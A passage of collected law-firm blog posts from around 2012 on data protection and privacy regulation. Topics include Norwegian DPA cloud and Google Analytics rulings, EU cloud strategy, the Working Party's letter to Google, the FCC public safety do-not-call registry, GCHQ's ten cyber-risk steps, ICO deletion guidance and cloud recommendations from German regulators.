In many instances there does not appear to be any justification for departing from the rules provided in the Proposed Regulation. Privacy International has therefore called for improvements to the articles of the Proposed Directive to address its concerns and to ensure that the Directive is more comprehensive and in tune with the Proposed Regulation in the Commission's proposal.

The Norwegian Data Protection Authority holds off ban, permitting the use of cloud computing services by Norway Municipalities.

This post was written by Cynthia O'Donoghue.

We previously told you about the finding by the Norwegian Data Protection Authority, Datatilsynet (the Norwegian DPA), that Google Analytics breached that country's data protection laws. In an about-face, the Norwegian DPA has now decided to hold off its ban on the use of Google's and Microsoft's cloud computing services by the Municipalities of Narvik and Moss, respectively. The Norwegian DPA had originally concluded that Google Apps and Microsoft Office 365 failed to comply with the Norwegian Personal Data Act because the municipalities lost control over the storage of, and access restrictions on, personal data processed by Google and Microsoft through their cloud computing services. The Norwegian DPA's main concern was the failure to establish a valid data processor agreement in accordance with Section 15 of the Personal Data Act; the arrangements also failed to meet the information security requirements of Section 13 and did not adhere to the rules on the transfer of personal data abroad in Section 29. The Norwegian DPA was also concerned that the U.S. Patriot Act represented a challenge to the safeguarding of personal privacy, even within the Safe Harbor scheme.

The Norwegian DPA is now satisfied that Google and Microsoft have increased their cloud computing security and that the data stored in the EU/EEA and in the United States under the safe harbor regime are protected by adequate safeguards. This fundamental reversal of regulatory policy suggests that the DPA is reassessing the significance of cloud computing in light of its growing popularity. However, the use of cloud computing services in Norway will be made conditional upon strict prerequisites:

  • A thorough risk and vulnerability analysis must be carried out in advance.
  • The enterprise must have established a satisfactory data processor agreement in compliance with Norwegian regulations. The municipality will be responsible for ensuring compliance with statutory requirements.
  • The use of cloud computing services must be audited on a regular basis. An independent third party must carry out a security audit on behalf of the municipality to ensure compliance with the data processor agreement.
  • The data processor agreement must be enforced, and the supplier's general privacy policy must be in compliance with the agreement.
  • For transfers of personal data, unless the destination country has been approved by the EU Commission as providing adequate protection, the transfer must be governed by standard contractual clauses.
     

The European Commission has published a new strategy document on Cloud Computing in the EU

This post was written by Cynthia O'Donoghue.

With concerns over the potential fragmentation of the digital single market and the proliferation of different data protection standards for personal data across the EU, the European Commission (Commission) has published new guidance on the use of cloud computing. The Commission has identified the steps it wishes to introduce in 2013 to ensure publicly available cloud offerings adhere to European standards, not only in regulatory terms, but also in terms of being competitive, open and secure. The Commission suggests that cloud computing, being born global, requires a reinforced international dialogue on safe and seamless cross-border use in order to create a digital single market.

The Commission believes that cloud computing has the potential to slash users' IT expenditure, boost productivity and growth, and create 3.8 million new jobs by 2020. Even the smallest firms will be able to use the cloud to reach out to ever-larger markets, while governments can make their services more attractive and efficient. The lack of standardisation and harmonisation across the EU is a concern for cloud computing adoption, and implementing policies to achieve this is therefore the crux of the Commission’s strategy. A preparatory study undertaken for the Commission estimates that a public cloud would generate €250 billion in GDP in 2020, with cloud-friendly single market policies in place against €88 billion in a ‘no intervention’ scenario.

To deliver on its goals, the Commission states that it will launch three cloud-specific actions: (1) cutting through the jungle of standards; (2) implementing safe and fair contract terms and conditions; and (3) establishing a European Cloud Partnership (ECP) to drive innovation and growth.

On 25 January 2012, the Commission proposed a uniform legal framework for providing legal certainty on data protection which would address the issues raised by the cloud, and apply directly and uniformly across all 27 Member States. The new legal framework will provide for the necessary conditions for the adoption of codes of conduct and standards for the cloud, where stakeholders see a need for certification schemes that verify that the provider has implemented the appropriate IT security standards and safeguards for data transfers, including the adoption of cloud-friendly binding corporate rules where necessary.

The European Telecommunications Standards Institute (ETSI) has set up a Cloud Group to consider cloud standardisation needs and conformity with interoperability standards. The Commission will work with the support of ETSI, the European Network and Information Security Agency (ENISA), and other relevant bodies to assist the development of EU-wide voluntary certification schemes in the area of cloud computing.

The Commission states that standardisation in licensing and security is essential to the development of a digital single market. Standardisation in licensing would allow customers to access their personal account from multiple devices, irrespective of the territory from which the account is accessed. Moreover, rapid adoption of the Commission's proposal for a Directive on Collective Rights Management would address many of the cross-border licensing needs for cloud content. In terms of security standards, the Commission suggests secure eAuthentication methods and the adoption of common standards for Internet transactions, which could be achieved through the adoption of its proposals on electronic identification and authentication.

The Commission also proposed the adoption of model contract terms to address issues such as data retention, data disclosure, and integrity and liability.

CNIL vs. Google, Act IV: Google Against the Rest of the World of the Data Protection Regulators

This post was written by Daniel Kadar.

We have previously reported on the different requests and repeated questionnaires the Commission nationale de l'informatique et des libertés (CNIL) has sent to Google over the past few months regarding the evaluation of Google’s compliance with applicable European Data Protection Regulation concerning its new integrated privacy policy, as well as the new integrated platform launched March 1, 2012, despite the CNIL’s demand to postpone such launch.

In an unprecedented step, the CNIL, which had been designated by the other European Data Protection Authorities (the Article 29 Working Party) to carry out this evaluation, arranged for the Working Party (WP29) as a whole, with the signatures of the heads of all its member Authorities, to send a highly publicised letter to Google on October 16, 2012, accompanied by a 10-page document listing a full set of recommendations on how Google should proceed in order to ensure compliance.

The conclusions of the WP29 are unusually severe, notwithstanding the back-and-forth between Google and the CNIL over the past months:

  • Google does not inform its users properly concerning its data processing operations. In other words, the WP29 still considers, as the CNIL did from the very beginning, that it is impossible for users to get a sense of what data will be/is processed by Google, and how.
  • Google does not provide any data retention periods. This remark shows growing concern on the part of regulators about data retention and the necessary information to users and regulators any data controller has to provide specifically in that regard, which Google failed to do in the WP29’s view.
  • The WP29 urges Google to “modify its practices when combining data across services for these purposes,” not only by being transparent about the data combinations performed across its integrated platform between the various services, but also and primarily in:
    • Obtaining the users’ consent for such combinations (the WP29 suggests that no data combination occurs before the users voluntarily click a “Search Plus Your World” button in that respect)
    • Facilitating the users’ opt-out from such combinations
    • And last, but not least, “adapting the tools used by Google for the combination of data so that it remains limited to the authorized purposes,” in order to differentiate between what belongs to advertisement purposes and what belongs to security

The WP29 also provides explicit guidance on the way such transparency requirements need to be performed: through three-levels of product-specific information displayed to the users; “interactive presentations”; more and explicit information as to the impact of the processing on the users, through the adaptation of such information to mobile users; and last, but not least, through ensuring that passive users are also properly informed.

Also very interesting is the fact that the CNIL outlined in its presentation this week that the WP29 is backed in its request to Google by all Asia Pacific Privacy Authorities, as well as by the Canadian Privacy Commissioner.

The conflict between the CNIL and Google has therefore escalated into a global issue and has been taken up by a significant number of regulators across the world that have adopted a firm common position against Google’s integrated platform. Without any doubt, European regulators and the CNIL in particular, have shown their muscle in what can be seen as a precedent.

This conflict is now entering a new phase: Google is required to answer to the CNIL not only on how it is processing data, but also on how it will finally comply.

The CNIL has indicated that it would not hesitate to enter into a contentious phase in France if necessary.

New Do-Not-Call Public Safety Registry Creates Additional Obligations for Auto-Dial Operators

This post was written by Judith L. Harris and Amy S. Mushahwar.

In its Open Meeting today, the Federal Communications Commission ("FCC") placed new obligations on entities that use auto-dialers. “Robocalls” to public safety phone lines, absent an emergency purpose or prior express consent, have long been prohibited under the 1991 Telephone Consumer Protection Act (“TCPA”). However, Congress has continued to be concerned about automatic dialing equipment tying up public safety lines and impeding access to emergency services. Therefore, earlier this year, it acted to address those concerns in the Middle Class Tax Relief and Job Creation Act of 2012 (“Tax Relief Act”). Although there is some overlap between the prohibitions contained in the Tax Relief Act and the TCPA, the Tax Relief Act and today’s FCC Order implementing it create new obligations with which entities using auto-dialers will need to comply, or else risk high monetary fines.

Section 6507 of the Tax Relief Act requires that the FCC: (1) create a Do-Not-Call Registry for phone numbers associated with Public Safety Answering Points (“PSAPs”), not to be confused with the highly popular Do-Not-Call consumer registry administered by the FTC; (2) prohibit the use of automatic dialing or robocall equipment to contact those numbers for non-emergency purposes; and (3) monetarily penalize those entities that disclose for purposes unrelated to compliance, numbers listed on the new Registry, or that use automatic dialing equipment to contact those numbers for non-emergency purposes.

Under the terms of the Tax Relief Act, anyone disclosing or disseminating PSAP phone numbers listed on the Registry will be subject to a monetary penalty of between $100,000 and $1 million per incident. Entities that violate the Tax Relief Act by automatically dialing registered numbers will be subject to a monetary penalty between $10,000 and $100,000 per call. The exact size of the penalty to be imposed in any particular situation will vary depending on factors such as negligence, gross negligence, recklessness, willfulness, and whether the violation is a first or subsequent offense.

On May 22, 2012, the FCC released a Notice of Proposed Rulemaking seeking comments on numerous proposals to implement the Tax Relief Act. Today, the FCC unanimously adopted many of those proposals in a Report and Order in which it: (1) moved to establish the required Registry; (2) made clear that PSAPs would be given a great deal of discretion in deciding which numbers to list on the Registry; (3) emphasized that the use of auto-dialers by anyone, including, for example, schools and charities, to make any calls or send any texts not associated with an emergency purpose to any numbers on the Registry, would be strictly prohibited; (4) created a required certification by any entity seeking access to the Registry that it would not rent, sell or disclose (other than for their intended purpose) the numbers on the Registry; (5) adopted a requirement that auto-dialer operators access the list no more than 31 days prior to auto-dialing; and (6) moved to implement the stringent penalties set forth in the Act.

Finally, in today’s Open Meeting, FCC Chairman Julius Genachowski promised to soon release a Public Notice specifying exactly how the Registry will operate and the date on which the FCC’s new rules will become effective. Moreover, the chairman emphasized that the Agency would be issuing large penalties for violations of the new law and implementing rules, stating “there should be no confusion about that.”

 

Research and drafting assistance for this post was provided by Reed Smith Legal Intern Rachael E. Pashkevich. 

Reed Smith Attorneys Interview Travis LeBlanc, of California's New Privacy Enforcement and Protection Unit

Reed Smith attorneys Amy Mushahwar and Joshua Marker, of the firm's Data Security, Privacy & Management practice, interviewed Travis LeBlanc, California's Special Assistant Attorney General for Technology. Mr. LeBlanc oversees the California attorney general's office's new Privacy Enforcement and Protection Unit. Mr. LeBlanc had a number of interesting insights regarding this new office and indicated that online and mobile privacy, and the enforcement of privacy protections using existing state and federal laws, will be a particular focus of the state's enforcement actions.

Please click here to read the entire interview.

Ad Networks Called Upon to Justify and Limit Data Collection Efforts

This post was written by Frederick Lah.

Data collection, especially in the context of Do Not Track is an important issue. The FTC has said that an effective Do Not Track system should go beyond opting consumers out of receiving targeted advertisement – it should opt them out of the collection of behavioral data for all purposes, unless the purpose is consistent with the context of the interaction.

Click here to continue reading.

Reed Smith Gearing Up For 'Big Data Monetization' Conference

This post was written by Mark Melodia, Cynthia O'Donoghue, Paul Bond and Frederick Lah.

Next week, Reed Smith will host a conference on “Big Data Monetization” at the Quadrus Conference Center in Silicon Valley (8:30-11:30 a.m. PDT). As we gear up, we wanted to share some of our thoughts on this notion of Big Data and give you a preview of the types of issues we’ll be tackling at the conference.

Big Data is an amorphous term, one that has taken on different meanings in different contexts. In general, Big Data is a term used to characterize the accumulation of data, especially for data sets that may not be usable for analysis by themselves. The term does not just encompass the small subset of companies that actually provides data analytics, or that exists for the sole purpose of monetizing personal information and habit data, but rather extends to any significant company participating in the digital data-driven economy.

Virtually every company, in every industry, is now an information and technology company. Companies run on Big Data, whether it be customer information, employee information, or competitive intelligence. Companies store, share, and use that information in increasingly complex ways, taking advantage of cloud-based solutions and revolutions in analytics, and finding ways to turn these massive databases into revenue – for example, by creating tailored advertisements based on customer shopping preferences or online browsing history. There is no doubt a plethora of opportunities for retailers, health care providers, banks, energy companies, website operators, and data brokers alike in Big Data.

Of course, using Big Data comes with its own set of risks. Companies need to ensure their disclosures are up-to-date and accurate about their information practices, and there may be laws or regulations on the collection and use of information depending on the types of data and data subjects involved. Both Congress and the Federal Trade Commission have also recently raised concerns about data brokers. In addition, some customers may feel uneasy with the notion that a company has too much information about them, thus drawing the attention of class action plaintiffs’ counsel. And, of course, having such deep databases of personal information highlights the importance of keeping information safe and secure. The more valuable information a company holds, the more magnified the threats of data theft and data loss become. The key with monetizing Big Data is striking the balance between risk and reward.

Our Data Privacy, Security & Management team has extensive experience providing privacy compliance advice to clients, drawing upon our knowledge gained in defending more than five dozen privacy class actions and three Multidistrict Litigations; our day-to-day operational experience answering questions from our technology, financial, health, and energy clients; and our diverse skill-set that includes engineers, software developers, cybersecurity and other technology professionals; former regulators and former in-house counsel at global banks; asset managers; and insurers. Earlier this month, Mark Melodia and Paul Bond were featured in the cover story of Law Technology News, “Defending Big Data”. Mark also recently did a podcast on “Defending Big Data”. We continue to stay on top of this area.

At the “Big Data Monetization” conference next week, our panel of experts will be tackling the following types of questions:

  • Why should a corporate officer or director or investor care about issues with Big Data?
  • What is the current regulatory landscape for Big Data?
  • What are the biggest challenges for Big Data as it operates in the United States and globally?
  • How does the issue of data ownership arise for Big Data?
  • What types of litigation risks exist for Big Data?
  • How does the so-called concept of the “right to be forgotten” impact Big Data?
  • How does insurance play a role in mitigating the risks that come with Big Data?

We look forward to seeing many of you next week.

10 Recommended Steps to Reduce Cyber Risk

This post was written by Cynthia O'Donoghue.

Many companies across a number of industry sectors have experienced some form of cyber attack - attacks which can destroy a company’s financial standing, reputation and potentially its competitive advantage, through the loss of commercially sensitive data. In response, and with the need to access and share information related to cyber attacks more widely amongst businesses, as well as with the technical level of cyber attacks growing exponentially, the information security arm of the UK Government Communication Headquarters (GCHQ) has published an article proposing 10 steps to reduce cyber risk.

The cyber controls recommended to help try and prevent cyber attacks are:

  1. Developing a mobile working policy to protect data in both transit and at rest
  2. Producing user security policies covering acceptable and secure use of the organisation’s systems and incident reporting. Additionally, ensuring user compliance with the policies and awareness of the cyber risks faced by the organisation.
  3. Establishing an incident response and data recovery capability, including training, which should be tested regularly
  4. Establishing an effective governance structure, and analysing and quantifying risk levels associated with all data
  5. Establishing account management processes to monitor user activity, limit the number of privileged accounts, and delete accounts of outgoing staff
  6. Producing a policy to control all access to removable media, limit media types, and implement the scanning of media prior to importing
  7. Establishing a continuous monitoring strategy of all information, communication and technology (ICT) systems, and producing supporting policies
  8. Applying security patches and ensuring that ICT is securely configured and maintained
  9. Establishing anti-malware defences, implementing scans, and producing and continually updating policy on malware
  10. Protecting networks against internal and external attacks through security controls such as firewalls, and managing the network perimeter, including filtering out unauthorised access and malicious content

Ultimately, the responsibility and implementation of such cyber security controls rests at board level of any business. GCHQ advise that in order to prevent the loss of company data, which could include personal and sensitive data, management must ensure that the company engages with peers across their sector, the wider business community, and law enforcement authorities to help maintain an awareness and understanding of current and emerging cyber threats.

Norwegian DPA finds that Google Analytics breaches national data protection law

This post was written by Cynthia O'Donoghue.

The Norwegian Data Protection Authority Datatilsynet (Norwegian DPA) has concluded that the use of the website analytic tool Google Analytics by two state agencies violated Norway’s data protection law. The two state agencies—Tax Administration and the State Educational Loan Fund—were not able to account for how Google Analytics worked, and found that there was a disconnect between Google’s privacy policy and that of the state agencies.

Google Analytics is a website tool that allows organizations to create reports about how visitors and users utilize a website, and to analyze visitor and user behavior. Google Analytics is widely used, including by some other European-based data protection authorities, such as the UK Information Commissioner’s Office.

Google Analytics collects part of a visitor’s IP address, which, in a 2011 opinion, the European Court of Justice found to be personal data. The Norwegian DPA found that the agencies should be deemed to control the information collected via Google Analytics cookies, but that it appeared the data was actually collected by Google, thus making Google, rather than the state agencies, the data controller. In addition, the Norwegian DPA determined that neither of the two state agencies could demonstrate that data provided to Google had been anonymized, nor that its use was limited to statistical purposes. The agencies' unconditional acceptance of the terms and conditions appeared to imply that Google could use the IP addresses to provide additional services that would allow them to compile personal information about the visitors from many different websites, and thereby potentially identify the user.

The DPA believed that Google should be functioning as a data processor of each of the agencies; has required both agencies to correct the information on their websites; and has requested that any IP addresses collected are anonymized and used only for analysis. Both state organizations now have a chance to respond to the DPA's findings before a final ruling is made.

This is the first ruling of its nature in the EEA and, in some ways, is surprising given that the collection of IP addresses by Google Analytics cookies tends to be limited by geographic region rather than comprised of the entire IP address. The final ruling will be one to watch, including whether there is a knock-on effect throughout the EEA with other national authorities taking similar decisions about the use of Google Analytics.

FTC's Final Order with MySpace Focuses on Privacy by Design and Protection of Unique Device Identifiers

This post was written by Paul Bond, Amy S. Mushahwar, and Christine E. Nielsen.

On Tuesday, the Federal Trade Commission (FTC) finalized its Consent Order with MySpace, settling allegations that MySpace misrepresented its data use and sharing practices, and its compliance with the U.S.-EU Safe Harbor Framework in its privacy policy. In a 4-0-1 decision, with Commissioner Maureen Ohlhausen not participating, the Commission voted to accept the proposed order and enjoin MySpace from practices that violate the FTC Act.

Please click here to read the issued Client Alert.

ENISA find deficiencies in cyber incident reporting

This post was written by Cynthia O'Donoghue.

The European Network and Information Security Agency (ENISA) has published a report on ‘Cyber Incident Reporting in the EU’, and has found that many incidents remain undetected or unreported. As a result, the lack of transparency and information on data security breaches makes it difficult for policy makers to understand the overall impact, and to use what could be valuable information to legislate for and prevent future incidents.

Despite the lack of regulatory reports, cyber incidents are extensively covered in the media, be it hacking incidents or ‘acts of God’, such as the communications havoc wrought by the destructive power of the storm known as ‘Dagmar’ in Scandinavia at the end of last year.

In order to address these deficiencies, the report examines existing and planned legislation to cover the requirement for mandatory incident disclosure in the EU. It identifies areas for improvement and looks forward to the coming EU Cyber Security Strategy, which it expects will emphasize incident reporting, and the importance of the exchange of information across the EU concerning cyber incidents and how to address them.

Key to improved European cyber security, suggests ENISA, will be the implementation and increased enforcement of Article 13a of the Telecommunications Regulatory Directive. Amongst other requirements, Article 13a specifies that Member States ensure providers take appropriate technical and organisational measures to manage the risks posed to the security of their networks and services, as well as to ensure that providers notify the national regulatory authorities of any significant breach of security or loss of integrity, and provide reports annually. Furthermore, an ENISA working group for national regulators has developed a single set of security measures and a formal incident reporting format in order to enable a more uniform implementation of Article 13a.

The European Commission is currently developing a European Cyber Security Strategy to implement greater transparency, which ultimately aims to limit cyber security breaches. Additionally, the proposed EU Data Protection Regulation will require notification by data controllers of any breach involving personal data to the supervising authority within 24 hours of its discovery, and notification to the data subject without undue delay (subject to exceptions). The report provides a useful overview of existing and planned legislation and the progress being made to address cyber incidents in Europe.

SEC Regs Amended To Allow Hedge Funds To Advertise: Potential Data Privacy Implications

This post was written by Alexandra Poe, Paul Bond, Keri Bruce, and Frederick Lah.

Last week, the SEC proposed amendments to Rule 506 of Reg D to lift a long-standing ban on advertising for hedge funds and certain other investments. Over the course of the next few weeks, Reed Smith will be releasing a series of blog posts about the various implications this proposed rule may have if it goes into effect. For this post, we consider the potential data privacy implications with the proposed rule.

Hedge funds and other issuers seeking to conduct private offers under Rule 506 of Reg D have long been banned from advertising in public forums like billboards, newspapers, television, or publicly accessible websites. Previously, such issuers could only offer their securities to persons with whom they had a pre-existing substantive relationship, based on whether the issuer was able to conclude that the offeree was likely to be an appropriate offeree (i.e., a sophisticated person capable of bearing the financial risk). The ban was designed to prevent issuers that were not subject to the full burden of the Securities Act's disclosure and registration requirements from targeting investors whose relative lack of sophistication or bargaining power might prevent them from having all the information necessary to make an informed investment decision. But under the new rules, hedge funds and other issuers would be able to comply with Rule 506 and still publicly advertise to anyone, so long as the actual purchasers of the securities are “accredited investors,” as that term is defined in the Rule.

While hedge funds and other Rule 506 companies are now technically permitted to advertise both widely and publicly, it is doubtful that we’ll see hedge funds competing with major consumer brands for prime advertising real estate. A more likely scenario is that hedge funds will become more aggressive buyers in the information market, and will use that information to tailor their advertising efforts to customers likely to be “accredited investors.” Perhaps this will take the form of email marketing campaigns, direct phone marketing, or possibly even online targeted advertising, for example, on a mutual fund or brokerage firm’s website. Each of these types of advertising comes with its own unique set of privacy considerations. It should also be noted that this new avenue of information-sharing then becomes a compliance consideration for both the hedge fund and the information provider. For example, if a financial institution ends up providing such information to a hedge fund, the financial institution may need to update its privacy policy accordingly to make sure it is complying with regulatory requirements.

The extent to which hedge funds and other issuers seeking to comply with Rule 506 will take advantage of these proposed rules (once and as adopted), if at all, remains to be seen. The resultant data privacy implications will vary depending on the exact advertising measures employed. We will be monitoring this situation for developments.

Privacy Stakeholders Tackle Mobile Application Transparency in Forums to Establish Codes of Conduct

This post was written by Amy S. Mushahwar and Christine E. Nielsen.

As we have previously reported, the Department of Commerce privacy white paper, Consumer Data Privacy in a Networked World: A Framework for Protecting Privacy and Promoting Innovation in the Global Digital Economy, sets forth baseline principles for a consumer privacy bill of rights, which can serve as a template for comprehensive privacy protections. Those principles – individual control; transparency; respect for context, security, access and accuracy; focused collection; and accountability – track the Fair Information Practice Principles (FIPPs). Commerce’s report calls upon interested stakeholders to participate in forums to develop legally enforceable codes of conduct based on these principles. The National Telecommunications and Information Administration (NTIA) convened stakeholder meetings July 12, August 22 and August 29 that began to tackle the first issue for the codes of conduct, mobile application transparency.

NTIA is using a polling approach whereby concepts are raised by the stakeholders, and then the group votes in a non-binding poll to determine which concepts should be tackled first, and which are lower priority and can be set aside to address later. Though there was much discussion about the effectiveness of this methodology, on July 12 the multi-stakeholder group identified many elements of mobile application transparency that should be advanced in a code of conduct. The August 22 meeting focused more on the approach to the meetings and process for moving forward, and the August 29 meeting returned to the issues at hand.

At the outset of the August 29 meeting, the stakeholders were asked to vote on the substantive elements related to mobile application transparency that they believed should be worked on first for the codes of conduct. The stakeholders who participated in the meeting were almost unanimous in their selection of the definition of a “mobile application” as being the most important element to tackle first. In addition, the multi-stakeholder group believes that defining the scope of the recommendations and ensuring that recommendations are technologically neutral and platform agnostic, are very important elements to address at the outset.

In addition to discussing which elements of mobile application transparency deserved attention, the group discussed the scheduling of briefings from application developers, others familiar with application technology, and those who could speak to the current self-regulatory standards. Such briefings would level the knowledge playing field between stakeholders, and facilitate a discussion about the definition of mobile application and common practices of mobile app data use.

The NTIA is blogging about the meetings, and the stakeholders have set up a website to allow all interested stakeholders to share ideas and information, and comment on the process. As the meetings and forums progress, we will continue to report updates and highlights.

The UK Information Commissioner's Office issues new guidance on the deletion of personal data

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (“ICO”) has issued guidance on the deletion of personal data. Through this guidance, the ICO seeks to assist organisations with their obligations under the Data Protection Act 1998 (“DPA”) and to promote good practice. The ICO acknowledges that times have changed and that, while one may think placing data in a "recycle" bin deletes data, some electronic form of personal data and documents most likely still exist on a system.

The ICO rues any impression given by organisations to their users that deletion of data is absolute. The ICO wants organisations to be absolutely clear on what is meant by deletion and what happens to personal data once deleted. The ICO recounted instances of organisations having run into difficulty where “deleted” data had in fact only been archived and was capable of being reinstated. Where the data has been archived and not permanently deleted, the ICO urges organisations to safeguard such data.

The ICO highlights the “significant difference” between irretrievably deleting information and archiving it in a structured, retrievable manner, and retaining random data in a recycle bin. While the ICO states that archived data should be treated the same as live data, it acknowledges that inert data is less likely to have a detrimental effect on an individual.

While deleting system data may not always be straightforward, the ICO suggests that putting data "beyond use" may suspend data protection compliance issues so long as certain safeguards exist, such as:

  • There is no intention to use or access the data
  • No other organisation is given access to the data
  • The personal data is protected by appropriate technical and organisational security
  • There is a commitment to permanently delete the data when technically feasible

For data put "beyond use," the ICO suspends the right of individuals to access that data and, most importantly, will not take any enforcement action against organisations that retain such data, despite the DPA principle not to keep data for longer than necessary. The ICO acknowledges that data put "beyond use" may still need to be provided to comply with court orders.

European Commission launches public consultation on Cybersecurity

This post was written by Cynthia O'Donoghue.

The European Commission (“EC”) has launched a public consultation on Improving Network and Information Security (“NIS”) in the EU, and is seeking the views of governments, businesses and citizens about their experiences and a proposed European response to cyber incidents.

The EC recognizes that NIS systems underpin complex computer systems in the finance and health sectors, and that NIS security incidents are on the rise. The consultation is aimed at helping the EC prepare a legislative proposal on network and information security, and to draw together ideas on countering cyber crime across Europe. In particular, the EC will look at “future risk management and security breach reporting requirements”.

In key questions, the consultation asks participants to give details of: (1) recent NIS incidents and their causes; (2) attempts to establish users’ awareness of cyber threats; and (3) the level of cyber security in the EU and effective ways of managing NIS risks. The consultation will also assist with the forthcoming joint strategy on cyber security produced by the EC and EU High Representative for Foreign Affairs and Security Policy. The consultation runs until 12 October 2012.

New Proposed Rules Require Government Contractors to Safeguard Information Systems, but What do They Really Change?

This post was written by Timothy J. Nagle and Gunjan Talati.

On Friday, August 24, the Federal Acquisition Regulation (“FAR”) Council issued a proposed rule that adds a subpart and contract clause to the FAR that would force government contractors to implement basic information-systems safeguards for any non-public information that is provided by or generated for the government. While the proposed rule is intended to plug a hole in the FAR that does not currently require such safeguards, the draft of the rule is so broad that it is not clear what holes it will actually plug. Rather, what we do know is that it adds yet another FAR clause in government contracts to an already long list that companies will have to monitor for compliance. Comments to the proposed rule are due no later than October 23, 2012.

At the outset, we note that the proposed rule does not appear to change security standards. Rather, it appears to expand (without being sufficiently precise) the applicability of the standards. Specifically, the Federal Information Security Management Act (FISMA) of 2002, 44 U.S.C. 3544, states:

(a) In General.— The head of each agency shall—
(1) be responsible for—
(A) providing information security protections commensurate with the risk and magnitude of the harm resulting from unauthorized access, use, disclosure, disruption, modification, or destruction of—
(i) information collected or maintained by or on behalf of the agency; and
(ii) information systems used or operated by an agency or by a contractor of an agency or other organization on behalf of an agency; [emphasis added].

Thus, agencies already have a duty to identify possible security holes and mitigate risks.

The proposed rule does not change the FISMA requirements. Rather, the proposed rule seeks to “apply the following basic safeguarding requirements to protect information provided by or generated for the Government (other than public information) which resides on or transits through its information systems from unauthorized access and disclosure.”

While there is a definition for “information system” in the proposed rule, it is broad and encompasses just about any information that is not already public. The definition also fails to identify what a “Contractor” information system really is under the rule. There is no clear delineation in the proposed rule between an information system operated by a contractor on behalf of an agency and one operated by just a contractor.

Also, the rule does not supersede any specific safeguards spelled out in a contract. A government contract or statement of work will usually describe the technical requirements and boundaries of an information system required to provide the specified services, and a contractor can price the equipment, technical support and policy development into its bid. And most government contracts will require the contractor to maintain the system to government (FISMA) security standards and be subject to certification and accreditation with subsequent audits. This does not change, and therefore the rule may be of little practical value to contractors that already have such safeguards spelled out in their contracts.

One concern is that the proposed rule might be interpreted to mean that the corporate network of the contractor, which does not directly support any government contract work, is now subject to government standards, inspection and audit if it processes or stores any government information. This could potentially include contract invoices, reports, pricing information or any other documents and data required for contract administration. Without more clarity, no program manager or CIO will know the extent of potential government supervision of their corporate network. Such an interpretation would unnecessarily extend the reach of FISMA. The risk of such interpretations makes it likely this proposed rule will be challenged on several fronts.

If the rule is not challenged and implemented as drafted, contractors will need to ensure that their systems comply. Exactly what constitutes the appropriate basic safeguards would surely vary from company to company with few bright lines. Additionally, the government could take the position that a contractor’s safeguards do not meet the requirements of the rule and use it as a basis for claims, termination for default, and possibly even suspension and debarment (for failing to have adequate internal controls).

AdChoices Self-Regulatory Icon - Now in Mobile

This post was written by Amy S. Mushahwar, Frederick Lah, and Christine E. Nielsen.

On August 21, Jumptap and Evidon announced a partnership to create and implement the AdChoices icon in mobile web and mobile app advertisements. Evidon, one of the earliest providers of privacy solutions that comply with the Digital Advertising Alliance (“DAA”) Self-Regulatory Program for Online Behavioral Advertising, utilizes an icon to let consumers know when their web browsing is being tracked for targeted advertising. Under the partnership, when Jumptap serves a mobile ad, that ad will notify consumers if they are being targeted with behavioral ads using Evidon’s privacy solution.

Under the new program, the AdChoices icon will appear on users’ device screens, signaling the use of behavioral targeting. This icon is the same one developed under the DAA’s program for behavioral advertising, and will now be rolled out in the mobile space. If a user clicks on the icon, he or she will be redirected to Jumptap’s Privacy Overview page, where the user will be provided with more information about targeted mobile ads and how to update his or her privacy options.

Companies engaged in behavioral advertising continue to take measures to demonstrate that self-regulation is effective and legislation is therefore unnecessary. The DAA’s AdChoices program has been far reaching, serving more than 50 billion privacy notices to consumers each month. In addition, the World Wide Web Consortium and web browsers offer do-not-track solutions.

The mobile privacy space has been very active over the past year as more and more companies continue to focus their efforts in mobile. We have been following these issues very closely, and blog about the issues frequently. Click here for our prior posts about the New Jersey AG's lawsuit with mobile app developer 24x7 Digital, and here for our post on the California AG's agreement with the six major mobile app platform providers on mobile app developers' privacy disclosures.

We've also covered litigation over the alleged privacy practices of mobile app providers here.

As the litigation and regulatory landscape continues to develop, and as uncertainty lingers as to if and when regulation will be passed, companies engaging in behavioral advertising in the mobile space should take solace where they can. Participating in and implementing self-regulatory solutions – like the AdChoices icon – is a good place to start.

UK Government issues consultation on consumer data access proposals as part of "midata" strategy

This post was written by Cynthia O'Donoghue.

The Business Innovations and Skills Department of the UK Government has issued a public consultation on a proposal to create a requirement on suppliers of goods and services to provide their customers, when requested, with information on historic transactions and consumption data in an open standard, machine-readable format. The proposed new power is part of the government’s “midata” strategy. Although the Data Protection Act 1998 (“DPA”) allows for subject access to personal data, this law only requires data controllers to provide information in “an intelligible form”. The new requirement would go further.

The government has commented that the new requirement would only relate to transaction data, covering only factual information and existing electronic data, and would not cover any subsequent analysis by the data holder. The government is considering whether this will be a general power or whether it will be exercised in a more targeted way, and who will be able to request the data.

The consultation asks a number of questions around the form and categories of data that should be covered, including what data would be most helpful to consumers, time periods and format. An additional question relates to which government bodies should be able to enforce the “midata” strategy, with options including the Information Commissioner’s Office. The consultation closes 10 September 2012.

The German data protection commissioner Schleswig-Holstein publishes recommendations on how to provide and use cloud computing services in compliance with German and European data protection laws.

This post was written by Cynthia O'Donoghue and Katharina Weimer.

The Schleswig-Holstein data protection authority (“ULD”) has published a series of recommendations on how to provide and use cloud computing services in a way that is compliant with German and European data protection laws. The recommendations are based on the Article 29 Working Party (the “Working Party”) Opinion on cloud computing (see our client alert), which analysed the applicable European data protection laws and provided guidelines to both cloud providers and clients. The ULD stated that from a data protection perspective, the processing of personal data in relation to cloud computing posed two specific risks: (1) the lack of control over the data for the cloud client because of the number of data processors (and sub-processors), and the transfer of personal data to countries outside the EEA; and (2) the lack of information provided as to where, how and by whom the data is being processed in the cloud.

The ULD echoed the guidance of the Working Party, stating that the cloud client is the data controller and the cloud provider is the data processor, and this will be the case regardless of the size of the business. The ULD does not accept the imbalance of power between an SME (small or medium enterprise) and a large-scale international cloud provider as a justification to accept clauses or terms that do not comply with data protection law. Furthermore, the ULD states that the relationship should be governed by a contract that complies with the applicable data protection law and sets forth the duty of the cloud provider to inform the client about all sub-processors and all locations where data may be stored or processed.

The ULD comments that data may be transferred outside the EEA only if legal requirements such as the standard contractual clauses or binding corporate rules are in place. Also, the ULD reiterates the Working Party’s comment that a cloud client should not rely on a statement from the provider that it has self-certified compliance with the Safe Harbor framework principles, but should obtain evidence that all data protection principles are complied with.

Asian Developments: Tougher Data Protection Laws on the Eastern Horizon

This post was written by Cynthia O'Donoghue.

